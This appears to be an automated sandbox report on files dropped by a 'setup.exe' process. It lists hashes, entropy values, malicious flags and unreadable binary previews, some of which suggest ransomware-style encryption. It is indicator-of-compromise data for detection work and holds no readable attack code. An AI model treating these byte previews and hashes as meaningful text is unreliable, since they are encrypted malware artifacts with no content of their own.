              Preview:{. .1........a.K...u..d.@f.%.!..O.....a.P..{....=...=.Q..6,.'..Pm...@7.gP..s..:n....D..f..B...'"O.....x..T......X.f^.....B.w.?.o..].e........o+.9U.|d....B.Z].5.+.T..EX........Qd.E[I....9..b..j.....z.E.H..|.q..J..O.1hw.....[..$......5"...,.. .j(?4.z.8...X.......ix.d"..<#0..o.T..w..r.@{=....I....fAV..............kExwL.o.%r..4...h.3~.....0e...F..V*..I..fZ.5>$\..s..53.ic7Q.....cO}e}..M.....z.5...8T..Y<xMEx.H9_.h.4,xPp..%o1..2,.6...%.\ql.y=..8..7.~..g..g.Y...`......J.B...[...W>.gQ-<C.....F...XMG`tOk. ...i.$4...s.zv.....?..r...Qu.m..iO.V>..h.$.e...Y.k...!.y{T..W...p.....im.........D..r..w.;.`.a.i..K.......2...L....AE$.V..N.a..f.(.O(d..Z~......."v..V.Zs.j'..U.?.....g.@;.DQ.%....4.....!kO.*#..C.u.#l..`....\..v.|8Cj>.YH.......Si...%..-......?....ocY+.Z.., .R.&<.Mo.`..8....T.ud.l..l....9m.~k......^.....\t`..hh.....1..30.....;.Ux6.Z..m.a..U. 0m....o.&...Q..a...!.......wb..*...8...c ........;.c.i.:.....]r4....A.E.E3.En........Z.Q.D...{
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1060
              Entropy (8bit):7.800567982333942
              Encrypted:false
              SSDEEP:24:lvVSqLTfgWsl2+gJkm+tpc7O126tKifbD:nBLTybnpc7Y26/DD
              MD5:E2BE602E73732EFDDC85AFAFB6111C6E
              SHA1:C5DF90E173AF1D7A7BA93712A3F3784877165854
              SHA-256:2694C5B066349BFBC876C843E438E9384915847909B3CC114AD753E8034AD567
              SHA-512:9FA5B217B245D1081001DA655E521D3A72FF956DA7A72FA2E5B990C38713B34BCDAA6F3F6D1054E5FB6AF8B60B00D535132B77023558487990BDAF952CEBA2EA
              Malicious:false
              Preview:{. "|[.n;...*q...s.E.O..lR.l..$.%..o'Sg...N..!24.Vq$.T.d/JPiR....\...a..Ed .....o.A.%...:;Y..K...E.#..K.h.0.......^...8.8H4.e....!.m.%......8.C>.`e2.._._..,..i......z]..F..1..cM. .(|.#N.Q...E@.l.W...X...!..C...B9.G#.....Z.#.....^.....5...U...x..?...3h..e......(z&"..Gx.w^..&.i.(.....|.....fZ&..v}W..8.U.......&.?..(..P...9.+.....;s..~a.U>N...4...Q......~"..r..../..<...2g..a.E.]....\..k.....`X..Y..x6r..z....h..`.y`.[....A..Q..;I.J.D'...1......x....6.q.!..?..6..[..D}L.LXt.o.'.M.-u.u...M.J.s.....=....1|."{Q..;....q*.......O..w_.xS9.#.=5./Z..c.Ve.{o...r..r.$."....[.....]K&...R..Cg...#.......iC...r.L.V..~<R..A...j....Ar......:.n....Gr.&c... .w.....&2j...L.L9B....I@......y....K.8.,..9=.9o..vN'o.....:...q...gy.i...kM.......\...b$...5..s.(G.&........C...d..P+w..W.........."&<.r..o.....9... ...eM.&l..+....iJ.^D.`?f.1..eN.U.._.o...!e/5..+.#e...<.#,.<...U.........D..E.{..x..o.R...q2.Pt..*.v...!...0....+T.`..F6.oH.P..&....u.VrBq0iLIRHjQLgVRLs
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2333839
              Entropy (8bit):4.656987988067784
              Encrypted:false
              SSDEEP:49152:GUWFYSiXPjpqxbq9emiTQuyg7oM2e8P/bzEF:GB
              MD5:86525972474D4184C55B0DEC47B4CF2E
              SHA1:DA33A924D790D4E418DCEE57DA27E8D68F6D888D
              SHA-256:08E070E98B7D64E66D0CD08F12BD28B7F8298B1E8BC72309BF923758362E44BC
              SHA-512:6A2AF71FCB020694A440466DC6400C15B10217012588E55890D45C53121163E75053BED991B33002B079C46FDB58A82B5D3E12F4F6D9DF6AE7D54C3843FE9146
              Malicious:false
              Preview:{. ".Ji.>i!t.p.f.-.-bm.."j...p8M..Z......Ew+..........O.#m-..8.|.D.QS*k\..,W'....>.....Z.|..8~..8....?..7...1..Y:.4.........Y$0_Ck............9..S...~4Uo.T....l9.=<o.B.E.M.*A..K..lzIg..iS......k.i.%D.U..VnQ4TKgY...3...W.......x..B.sp.4h...M...8.f....1..y=v.n.......6...W.0l\..q..........3..R:..b.._..+!I......q.-J.%K..U.:=.u.6`.&/.w....`....uXI.-...#......k.%.-`..P-.....Ur.S.B^....p<vyp.)....-..../..:].T^G..iK).....e...$.....?x..b..bz....Fa.w.k!+.........7.SlpE.&..7.i....7.`d*<..l.O.E..f...C"XX.s...I.}...z..?3..~PA5v.....ap...l1.hWp.v..D.r'.....CV.E.#..d..u0..k..S....:_Pz.H...C....$...4.L.1.I2...&..dy....$.......l...=..."..@U..]..H,t<[]._...V@OE.^.AA."...D..1|.w.$.*0....Q.Q.=.+.2..E..+7....."....i.u.D.3b..@_0.Q$h72.o..q.(R.b;w....D..N.v.V../..........A.]f.W...g.. ...."..l...A5..q...E;M.6..}..^;..[..9.@.Q(..K@w3..~.!kO.;p7....E.........~...P.c.....[L....8.6.B...?^..tc&&.u4.A...m..*)Pnf..?..vR+W.Z.....dy...&.pF..?.....=..Tw...|.+...%.w....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2333839
              Entropy (8bit):4.656761216122674
              Encrypted:false
              SSDEEP:49152:sL6FYSiXPjpqxbq9emiTQuyg7oM2e8P/bzEr:WQ
              MD5:4C9A9EF32856FBDE9FA9914C57BE8AF7
              SHA1:535BA073BC66AA6E8EA8F38543519C0FEB3A3A9A
              SHA-256:F8A2C6D15EC16D8FEBF1B409DE000F35946FA8D94C3C1271688FF1D4AA17EE64
              SHA-512:02F4DF9283640A7B5FBD70E88901AC0610591507FB6738D27922E2E4590D5AC9738B3B2FB90235F21B50CA1CC0CE6EC32F482442F7A13E2BD285B3AED6744E96
              Malicious:false
              Preview:{. "...~K+Z..l....Y..Ek.2My.^...y...P.......q~S,t..fc.Z*.....M...%.;k.<vF.#}..*r.g.N........>.I.!.Z.N"".6".d.../..m........P....~}C=...)..:>.<m.......P.h.m....-.a;.t.*.nD.{y....s.A...O.l..U.;.qT...W>Z7..34tB.K....fL..Ht.....r}....2....c.d..=XkR)".&..o3.".8f.........l.28f.......-<.l...eX.z.P.FPDP.._..b%....k.M.!f..2.Z......d.~.....Jl.6.,...7S.b.t....._1...0i.c....w[e..Y#u..C..P.....E....7.Z_........P...p.@.....4y......].S.`....h*.Wh...z..m.(N.Z.....1..(.sH..@9ST..]$.d...._....&..4...>..<W.a..%8a.t<RM=<T..8._n..o-..#.W$.{&.o..>...yp..w.P U...Y..F.g..7*y!k..T_Q.o..OI....wz...l.:0<FR]/.b........H'...m..#.S.E..)....ez...O.gn..f+_.v..R..9_.a.JY.B ?3.......T.K...'.S3.l./0P....S....q.....5x:L.n.,.....7,NS{..k..C..... ....bk.m.7#...R...t.p.bI....5.?a....\a....=Jc..xG..<.U.{.5...T..]|23.(.cv4(^a...D....wr...|..]+oy?~H{...!B.=.u.d.5N-.PG....O3.a.6..G4.R...#...x.o..........>...}...@.'5.6....].P.k.a3.!...rT..1......(8eK.*....:3....Ll.o...ljs..........:|>
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):24582
              Entropy (8bit):7.993201738016079
              Encrypted:true
              SSDEEP:384:iu34SKIfYpRVw7m5sDud1KkIlafiCUyApL36v84QokEG7cVJURu0iNe16qOzDXNI:10IwpR3sDm1nKCUyEL3AKLcQF7ZOKR
              MD5:D036C4522E288B1349A63829ABE51E48
              SHA1:E209F18BB79004C57BC6156CA79C2D5ACA8D9828
              SHA-256:2B0E434CC6B1A1ED5C55C99D12854787871908B061F89B63B185E74D0B713EAA
              SHA-512:17AE60F867C629A90F6C5488A1C9F1B4F5BBDB848AEAEA8349C1557ED269B5AF886826DB57D62CFEAE1D88A0E4F9224E8309BD3F41B132D24A1CFEA53465F7C7
              Malicious:true
              Preview:{. "..yf8....kF...W)..M.....C.Z.._^.......CL..C......./..'....q..-........Y..2....._..z.Ouc.x*...j...].V..P8.".jh..:..N.bh...y..T....)..M..E..aFnk.M-.%H..H>-\.......y..jJ.k.F.!..`.da....\.4.$\.....8....R..[........C."=...x...M.@.f.%"5..7....H..E...~^...d..Q...CLL"].~.+...BKojy.~..D....*..)...KR...X._......y........c.eHk.o.t.!...[$qF...E.........oJ..u..x..o.....F8>..G.|..$N..\=W5.fe..6oX..!F..........`..1.m.0+.....\.../.=`..!...(......$..)]......%8$L.K...E.".@.5FJ0Z.`....L..$.@[..UeB......b.w..)(...TP.x.-......n.&. .Gp:..1`.Va.@T...X.P....5.o..|.....g..E..pq?..|&[..I).S.J".sY."..pFw........Vs.A.J.r...l.....N1.....5..=.ZM..7..c9..m.n...'7.F...B.r.e.O3.m...,.h.i.a.....2.p1..3./l.qF....n.....q=.!.C.3.H...}.H3y&Ql...k...{...4...m}h%0.J.!....K...J.....,.z.....V.b.u..Q.S.......*.o...k.%.b...f....=.....2...d...C..[Xj..YW..X..=....!.u.0J.K...}%\.I..,.RN...b.c..I|.[p..g{<g.F..*t*.n.Y...Q.!.......G...E.....YlQ..2.0\.....J.6J.0Cu....wDc../.NJig.V.Zi .-
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2198
              Entropy (8bit):7.921795723190795
              Encrypted:false
              SSDEEP:48:g9BuYroA5N7s44NJI39Ez5S4WsEupWlkhxB18cqqsXan0IXD:g9oYr7/3Cg4FhhxBucAXafT
              MD5:FCE420A1629EA662BECBC2433FB5F9F3
              SHA1:74C3308BA24CD8C3CC0B14C29833B92793E3538C
              SHA-256:3AF95D5DA3360D9717860AE4DE6374A5492485F4222CA2ADEFBFA9258521DD16
              SHA-512:5FAE4259B287E853B7EA6A39663418E204FC4830106C5D3C62B5A8C682294BA199C575DCF0D4FCF053904C4C5D793EB1A8F325531821363D590A234402EE8F9C
              Malicious:false
              Preview:[{"de......^..(.F...+Wj.2A..U...._...3u.8...@....#.:....p.Jz.H..t.B.....>m..x.F.U.V..T.Q.}{...&....0_#n.{^.V..^4.v...#.n2.e...1..c.>^...$.Yn.H..b*.....UL.H ...._5....iv..z..2.C.{O..z............./..e.F2. ..f..~.!QmT......oe?....b-x...;.b....Q.......,.$-..px....U........=.....;_...".hl.)~.m..Z}8v.f....j4..y.;...[K..x..'..!G..`.S'...*.CA..`N....Q..2.`+....q..bM.....yt.....X.....se.\..g.@......\#9...eZ...V.*i.>z.....U.n..H2....{j.9O...............].y.+..YJD.[[Q.E...1..C...CL..U..A...Q..e..O7.....i..Uw...-y...g..i...O.Z.7.odX7.....}EK..w|.k8xk?...9..,.^...W4.p...R"a...-.nC....x..[.....p.-T..Ad..+PD.2......f].]......-..~....T....lP..Y./j.>Wz.(.c..@.-..(....t.,g..l.$a....vh/.:x....F..i.t...P.g.. ..qt.....G..*..-i4h..4.+:...j....A\;e.\......B..nG.k&...5..Y.>.....b.>l. H\.K.9.l..*K..e..K.JE2......!T.. .U/e...l.".Q!.c.n.....Z..7.f,.o.+.0.S..uo"wZ6.....lx....o1g.c0s.3J.q.n.TM.>....j..(...Y..O\-.x~.]E...}12G..*....a... .....k.../..# -^a.X..@3........n.J.H.7..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2092
              Entropy (8bit):7.900533768776793
              Encrypted:false
              SSDEEP:48:XFlA4uSE3VTszZ8B0MGzNl0lbj0RkqdtAnB+cWvD:U4ujozZbMG8wkqdenB0
              MD5:0A187F068003262C07BB31E9957488F7
              SHA1:67C936346FE38FBB44BE517C0F16A6ED2C7A86AB
              SHA-256:7578CAE3430E516A9699DE7E1ADEB785F2EEB7A50EF3FF8115F86814B8439033
              SHA-512:4B6865FC43185E6484420294169E125A96B6F66B5CB7E1CC5B9B513C4A44ACAD723B66FC1388D8025AE0BD93ADB15382DC5A2231CAE0F3E26145B8B7542DAFA0
              Malicious:false
              Preview:[{"deH....x..b....<......l..X1.[....i~..6m.WBK...x.$.4Dpe......._.N..(....K...5.xG..FgZ.e.r4........\A@tY.&..P....<UXD??..v..3.,.........E.5@}U.2,.t./.zNW%.<...D.e`K"..U......"".~q...s`.l#...p.@...M...........%..O.....90..c....|.1.[.UQ..;...XR..._.[.w...'.{....&....PP.......,U..7.c.....4.H.N.. ..../W/...P....~.h....-a...f...+....;!%.!@=&.....1.`..X.....Z.{."V.E....Kp......9....>........Njv...H.iOU....nK.N.x+............z.-...p>..6..../N..p..u....3."'7...88.G....a..._..6l.{...0.H.. .(/W.i\$...|C}2`.Cu.7!hU) ..9.....Ec!.....J=D*=..Z....J#...ds..`[.8........2...>.......E...C...tN_....n%../..$..z.h....[.pp..RT.~y(GN..* |....aQ...G+..8S.f=.......2.QvA=.h@.o.v.3.&....&.v..`..._.X...p.Gw8...\....$...E.............L...z...... ...~.|..{t.N...f.L....w...b.=9..u..(.B.K....Q.d|....26./."..e8.C.5..A..'..o.,&R..m...8..B|:..,A..oj/.C.....*..VxU..ipl.....@.N...K.X2.m~.mu.P\....Q....Y..d..<.........<E]~....-......L.k.]C_...w..G.._Y0...6;...j.Y.(gW..4...Eh
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2649
              Entropy (8bit):7.9312926614708195
              Encrypted:false
              SSDEEP:48:qF5iwzvFdOr1bZc3zq1UpyzTkZ+/UGYTDVQ6EKD1lv3IIEQulsYTUIet0i02xDd8:05rer1bZc3zK6yzTmTDO6FDfYaulsYIu
              MD5:FEBA2FD9ADF74ACA53FB13BC15CA9BE4
              SHA1:02110F4567FBC99962D7F64AD21CDDA26CBA7205
              SHA-256:CEC9B5BA6CA3B9C87F69FD3017926B069F5CE68F932F146F1F658B0440D144A5
              SHA-512:FAACD97CF9868A03BC8D9542CAEBFFB0C77E1B1F610B272ADC67EFCF725B240B5867336070415E01BF133617CEDDA97730AE37AF8678F93D46DF377E335CF0DF
              Malicious:false
              Preview:(()=>$...?..+.....-..9+\R..-)iX<s*$.K.C..y.....u..@..g....ES.... ..............9S.....H...n.?.c.b.....]..|a<....!N...~.`.mt...R*..'..K..*..q..+..7.xpg.p.9A....g..%...jn..-G1(.`.._..!.J....C.|g.OR.W:....S......H..X..u.'.p.+.~...+<...........Z..V.....O7z..x..u.... .yM.i.'?......r...h.1.F..SL~A`.>.ou=...|\...O.*1...o...*.Z..fF.......r......;.q...&..b%.l..M.6m$.?.e.\\+..E...X.........6HB8#....{..l$...5@...0......K. .....[...{.Q...<.4...^...c..>l.-..A...ciGRk..l...*.+.n2O....U.....z>.....!..V.=.R|..a.4.._.z...9.........11F.U....P..J.y....rN..G....-.h....2.\...Gz.E.....x...+.H%.!...ml.$..K.].h..l....S.......K..f,L.....w..$#phQ.V..~.{.~......b..Z^.F.....5.5w...._.f.m:.<bKA....U.f.4.i..E...C..&....2U............l.g..K\..n..+......e....K0.<.........||xQ..x.hJ.<.[.Y.m*|......R$..M....<..B..Ml/5....o<...TBR.. ........`3..i.V...pz[.4.ld%..+\v.....6.+4.....?.6.;Ox.8T^..E....i.'..AK..E..zA....f...P76..6.e.....]]...q.$.>Fc.......Li.O;9....<.,.b..su.....c
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):400
              Entropy (8bit):7.3824979426021
              Encrypted:false
              SSDEEP:12:IOOoiIbrtIzgYB7viHpMUZBux2zsMR2cii9a:IOO3Iqzg2v8MUS2YbD
              MD5:B4F071E98FD388809A2D15700A35619D
              SHA1:0408E5EFE8E11D5823016C10F515C9CC0DD58EEB
              SHA-256:7C20E62CA0528501F46CE0B6812804B90FE6591AC506C49F4A685E3D7E26465D
              SHA-512:8AD84BF1CD891C6BEA544F90C31756BF90FB3148B52EC7149977FBAF1472B361D1A82B2B14FA6C94CCE2772023C89F29C734BF60C6B87E4132B8FB25654BAA7C
              Malicious:false
              Preview:1.2F9..E ./ .^...CO!.w... ....>..g(............z..'.9.a6..KS.L......p....|..R...E....;_.KgC>..m0}......JZ.../....hP..b.........9...SCb.k.....n.k4f.....(:e..M.f^ng_z..../.. ...t.B..X...Sz.TM.<L<..[mD+..?"...Y.....0.....r.es....;..Z.[.#AA.%..a(p...G..6W.%.I..(.._JxH...-oQ....:.J1....o..V..(.bd...;.....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):450
              Entropy (8bit):7.43025865155254
              Encrypted:false
              SSDEEP:12:5svpstjrh2KrNiTomBGXQ3hhmBnK54H1JykgkvmwsMR2cii9a:Kvatjt2ONro2BK54HSk7ibD
              MD5:D65B957408C3D9BE1682D99B18897930
              SHA1:3A243366FF589074541C0C816FD2AE44A2B5ECBF
              SHA-256:CD8530960F54570655E5303CC1EB1D30CAFA7B6F5D8889FCAEA9B858B8EA6A8D
              SHA-512:F7A2EDFB3F5EE43FDE5980FE4934894B35B9F55C130A1ABC8C43FF732DA3E966D790B9621E05B13B1FA06DACF205E5B07E975562087C52D8E2FCF554B231534F
              Malicious:false
              Preview:{. ".....X....e3D.]3/..Q.c...2..R....ay....=0M...Be.!..._..xqA.....j........Yg..`p.m.O.........N.._...5...C...._.!.{H...{/..g....-..sS....[.+e......BF..s!...`G.71..N.t...p_9....W.#`...S...8MB-..h.9....K..U.b........O..,.u.......K)>.'..mW...A.s.s.@.J....U.......$..6...|..b.2e....T.3.q......=......v-.q.CF.N..(+...s.@9.8. .."2<....1..K.C....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2196
              Entropy (8bit):7.899454876371367
              Encrypted:false
              SSDEEP:48:7Htd6UszjJoY73UB54HYCsnglhHYs/PGZYVfKijeJzzZORYOD:rt8LtDk54HYCsnglmePGZudjeJz9ORY2
              MD5:AB791365F0535F5D2D7E31F3F2A3C479
              SHA1:451311FCF31B3B681C2ABE060860317B82796310
              SHA-256:78223EC6D9405D50474583D5D8D63BF1D09FC113FC04519F88DA8DF4575AC118
              SHA-512:F55ADB402F988D37926051B70DAA34858B6B8F5B397562A563DE497AA91416F7E0131C3B758BEB7420D53E0A577C64DE929DB53F4183FF6F0189486F4A33850F
              Malicious:false
              Preview:[{"de...[JE.........d..t.(.j6.CW.N;zZ.m)..!....l..p9>.x<.d..(-'...[.T..H.F8.+!.W..q.U...?}.....+....7.D7...H.g...B......[.....Y.`.........!.Y....bj.;.t...xqmIzc.<.....#...5S.uZ{t. =.QQ.5....iCy...I..'.!?p.`.. .....G2t.ii{..g...]g...D..(.D...]0..Z3.7..Z...y...T.%W_........=...*ifa.u....(i.....z.$..k.....%E5...{...7=....Ax.d.fa"4.Y[.E..,.!.ch....#MR!4_.i...(.w...e(..wD....UT;H.C...o.?..-s..X.t..&.]..).vc".1...3d.@..K..I.5....B.<D..H.Tq.$..i.\.....h...%.S.....y.:........,...R<.`.....e....n...;...m...h/.,.u..........U.......!..Wo...(j)3.....Y|.-.+......'..,..m.yN.f....TZm.9......b.iT...:.pd....O.R....}.y*<..E..q.T|..|m.F.11....[*..uh.?.g.b=v.+..l."(....U..Z..VNw.}*...-.wU ..2.....s..)...........v0.j>(.0+}.K.,........n....d.}.....E.K.r....?...l-.I.,U6.T.......~%q...[..jT..EB.iV......>.q.r.^.v....1.6m..f(.9d..M..f .+JLw..x.`.4D.h3bi=6....(..;h..6.....I....r..TN$^nh.I..Dh.L..xK..O...~.|..j.:h... .9.%0.-.6o3..=c.z.Q....o.3J.y...t.n[Q5.z|k{.....m.3..D..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):6034
              Entropy (8bit):7.967111532823073
              Encrypted:false
              SSDEEP:96:yzNWVveyuCRX/P4j+O9CShOvpiZUFrvshKJ86TQ1zAhAsndvjKS10VDG2VKDV1gI:yZWFC6Xch5KFIhKuaQAj1yq2Vzvgz
              MD5:1F2F0A554B0647253DAC81F17EAD1D1F
              SHA1:2CA30904500F25864E4D5B84553D0CD3F69A895C
              SHA-256:8904025EE7D7970248EF2B7C91E7C15BC2E27F3F51744FD3743A8D56488EA259
              SHA-512:83F086431F5C34FB6DE7FCF902708CA85DADCF5B02F5C6397DBF06DB6A75FE361E4520986FDB4FCF455F42E46015046873F152CBB1583F3A3151E7BA66CA5F5F
              Malicious:false
              Preview:[{"de".....t....."....-I...*K.n8.@.y.h..u.uAL\.;m.v..........iDw<.3......rO.1...\...j.....r~.q.&...6.....V..+h.Nh.....Z_...d`.)...6...M7@If.E.z.......0...p.(.Z.@N".H.B....R.!.R.....9gUP$^....IFZ......d..[_w..1.#..{w...t..F6....K..q.r.a......Y.,wlql.@.< ...QY......\.,...>6.h..=..x......E.hK......._..!...5[.n..&8Q'..6w.....a..!..y..#.....g.{n...h.l..-d...EI.e..W.:...K....A..V{.%.5.y..q...[.Sf....%#...s....>...$p...4u.G.r.MN.^..".[/.....T.O........{.._.=n...P\:..r.:.#.d'Q.."..\.IB..S^m..=....[..N..#.z..sQ...l...`Q....2)>>b,.9u[.....I..U...'.'....-...1.q.LI.z.....+fg$..H.... 4A:.EF..| ...@...(..|]R........^...3...gt.M.3.#.s..e.w..T...g..r..].>...V.@d|W..(c!...b(..h.(j...-`.(Vh..... 9F.......%.E.).,.........r[q.0.Y[.....$D.S..5..k.....v.h..s..>...*6Q..T^CN.X.&P5..b../.<...}..Z.........4..\|an....Z...U..U..@...U.).A1W......{.....[.Ge....."...2hQ.......%.2.|.......J.6Zf.'i...eZ~..w...B..aH.Dy... .e.@.{..B..O.GT>..#.;...<......p.....J?,.)G.w.G.E.=r.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2203
              Entropy (8bit):7.914612969638267
              Encrypted:false
              SSDEEP:48:7qkSEUQRJEfekK24Gbq8WXof1uqdMJJlVt4D:7qmUQmVk61pdkJlU
              MD5:097B044AD68B8C39A5F82CE5A9E1A415
              SHA1:9985DB09554AE1B7861376E53E732E85E70D79D8
              SHA-256:C7BAA5CDB1FE4C9D7B109ED59865769E0ECB21B8F6E3BBD09487CAB66E0E3CA7
              SHA-512:553C8C6EA12FE16F97BCAE4BA3499E413952B6FD034513B159209B582A4DC3488A2268F0EA7709C000BCCEB31B202A8D0C9B1F8CE370403A96D28593068AC323
              Malicious:false
              Preview:<?xmliv@G.)..m........c.........~.GX.......I.zg_W$.._..&..X....e....6.d..,L..+........-....A..S...X..@7....\..E<^..?......i.e..f....I.....D...S........#..q.JY..C,....,Q.cC@.A.....}IL...H..;.QZ.s.QE.I..?......K,Q............QCV*...y..z7........[.......<..*..z.$....%.#.i;\Eg.....E....q.N...{....l..SM...../Ux.......sH~i.0...?..T... .1.<o.7%...t....^......n.X!..Id-.}.......^...v.......X"^.F-.`..].k$...~.A._.,.Tj....7.N....X..}..<..........Ag..yh|.$*..E..b~@*.x&(..[..9........-.+...c...#.Q.M.-uB...q..E.^d/>k..T=B.F9I...7nX4..N...V..$.fX...\.\.../...!rc<.!.Z..C..$R......^.a......_...|D....*...h...K.m .5.`.L9..i>2..>e.....c`.....&..._*.pL......[.sQ.8}h.7Ek..(`....Q.cKQ..t..yCm]....f.Q.Y.-.Y.....l..R...k.Q.EBy...-..5.:.EI.._.^...v.7.,.lQ,...7.L.~...?0h!..H.GJb...".V..u"../#.b.aL_.%.Gy.G...!P..6...........{.(U.`.w.Y.x.....b7y%....g...#.iv...Z..%.E7.|..T.NzW....9.(-.g.G."nO..0......Z.R-..Z..h.n...=..2Jl.>..`.b..z$..Sg|:.n...f^}...Q...KgU.?o...o.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9775117078827575
              Encrypted:false
              SSDEEP:192:sJQEJHE9yhgxeIX8StP2o9kOpDV54ckcNUNMC23R:sJvJW8gxrLtZ9kOhVycX91
              MD5:8E2C69452E85C19F15E8D7EF9EA123C7
              SHA1:2CF457B0D45FBA038ED490E25C4ECC7790263058
              SHA-256:D717F6BFE7680F5839A7189ACA92319D7DCE2E66DE0575629D52961482575AF0
              SHA-512:24E25DA2E08EFC855BD0F8D417ABC21694FAEF6C1CE47EF9945FCB6BC3A06EB274A780080326DAB350ABB7BBE2B55E4C6F1912DBC1424191402073FB4BB721BE
              Malicious:false
              Preview:h..F..Sh2BV...w..\V0!..b+...B.S.k..|Z....4.^.9......+.....X._.l.....|.......K..L..~+..?..+.&.).. .J.#.........1F.uZ0,..\....,/`.P.y. .%..U..u..p.._I..K..N......I.k?5..&x.........q. ..!.5y.....S...~..D.O........y..2....G..."]...L).0..6...y=..@.....cJ.t..a4..L.......'7]....y<.f..?){.~|....-.g.j.....N8...W......0...1-J\^.....(\..y.v.m.r/C.<.K9:.A.h.yi...EcX,.}.....V.lfYV.c.,@..o.%3.../...>..Zf@..E6.....u....ms.5..ua..`7.......-..WX.r..$.%.:M.]......P.g..{`....dZ.dE.......@ .;.!..;i.T9f..2P^.da..."nY..+..A(..P.....W...4..h.;.s%..<.E.\..gh\3i.}}.+.W.o*..=....W.j.R.....vj.!H9.,....C^i_..>.].s.<r.~.S......$Z....C6.........N.n..Z.*...p..\..F.W.Kxqq....s./@.@....k....~+.m.J...H.] ?...jv6l|..~gP!..Y.sQ....>9....^..;.."ee..+.+....E.L.w....h.4.k.-.....a..........+.e..y..D.)lS.8...]..e..U=i.....S#..t.*....:m.8.....=w.<.L.ZW...Ja...........+..]W....Z%G..MW.S..7..-..7.6;.g..K.n....h..|...t. :..>..l...dX..%O..4&V..~O..,.!.G..O..9..-..k.D\?..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.9624619457721924
              Encrypted:false
              SSDEEP:3072:jhubAQBbip+18MTMCR51FSaxglCW20RQbxMHwJmp/1dDyJVaYnBI8BKw4orPVvYM:jc/bq+18H2XSygCW20yOwk11pGD8eTN
              MD5:7F56058D05FB33F09F50C4BE29402A72
              SHA1:C1B331057BBE57CF8F70ED0FFCAD6B95B2E95595
              SHA-256:4AD143AF983B30BA400D989207FBB73091BB4DF8AAED39AA4D96BE9EF2CE232E
              SHA-512:4533EC6B02180B5126E1EBA0B74935136DEE0E21613F8774799A8CBF881FAF9D5907E81AFB7AF2537A2DEFCDB94E4ECC22F3581E815F0DAE71086CA9866F9CBC
              Malicious:false
              Preview:.._..!..Td...>.t.s....w.".....r,A.z.S1X..L....E]"s..i..'+36...q+...._b.s....h..q....nrp4......R.h'...Y6g...0I.L@a!.......D.Kf.1..=d...........I%.T..}..V.h2.{.J..o.F..h...).P.6k..3s....I_|._t.....N...f.9.$...F..4:;z*.,.@fq~I..u.A..{Gw{.d...<..H8...&...K...'... Xjr..J.e;.E........`.~...rD.i..).,.F......K.'=....[v.I....+...X=.s..D.LV...P......t.]../n..O..%.....'..H...2.O.tr.............NQ ...O.q......y.{.L.D..+....m.~.z..x,.r...(...HdQ....Y..g.....q}..+S..S...NFz..K....j......[.-p...].8e[...(..].%c.7...P..C.f.....*.;.....Fg&d.O.!.-.p.%x....@..GK.....l..s.....`...S..(7n...u.&.yS...51.........M...[..........l'j.:....d4.;.....9j`LKRc.....:.F.N...1d...s'...X....bL..e...LR.C1p%..hC.k.E.o....C..`...e.{..Q..o.2.......*)s.......-.h.+....Q5.\. n...o...ew."..?..Ah.F|>:Y.......t".X.....~.t..@yhY.....m...j-...S.eGn..h..T....uu...Y.".P........Y>1`.....h..<...*....,....~._!yy......V.Y...P...ONp..d....6#..$.....bC.....n..-b.....e\......a..U#.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.208333138184473
              Encrypted:false
              SSDEEP:3072:PEpVKgLBZEWqisE7ZRqdcF/Ta6jyFMIQirdrBFIg43EDGNBDj0FGZKS0:P2VKgHE5E7ZMd+HWFXQoxoEaXva
              MD5:8782776E8E0D6C60D3FD354F577628AD
              SHA1:32679E6B5B95A0FF5B9C06E6D1A5A2901A1CEDE7
              SHA-256:13E7DA1F8CF3A491612E30961678522EEE99C3922F52F3F98543BB03E5044D20
              SHA-512:C10D8A0C559F2C6F02EFEA426160920011DF5CFC0768162B3FD46D9221CD82EFB3830480B2127C522CE43A19FBB1F19DB62E48FDA8BD453DE0BBC8ADC3B8B392
              Malicious:false
              Preview:.......U..D=.<`_....3yS.>.z..6.+.5....3mY";..=...'..P".x:.8.5&.j.r.T..}..Zj...j.z.."D...z..l.ox.+ic.."S.].h@D...R...X:.8f..=$./M........=..C....}(x..[B#...j(.H<...O...b..........I.-...?..pG..W..3'.2F....'.}c....<./..........,[.S2{AAh`u.H...2t.....]...J......kAC.Uu...w..I.F..s.a.8.......U(..P.T...v........R.E....I..z.........u.;......l.4A).?.K...~a..j.GG........V.(...q..Do.C.m.wJM.....t.G....Dr# P...K..9....f.J.4.S$h}.}...[hqrU@.....Gt..hk..K..@g...1[.S.`.%.....iB.....{.I..X....Y..6../.X....9.h...s:.....B.6W....2x..\6,... ...FN}}..~c.B...!....jo..Q.:cJ".".....iR.J....D5..d$P....Gb....M..aG.hM =D...7....NGM....n|......$^1..7.4.xzX.eP2...,.O.c..p.Q.j.U=jd..1......#j.cp.g.?C..w.....j.Z.N...v...-1Xt......OC.Mx.n.u 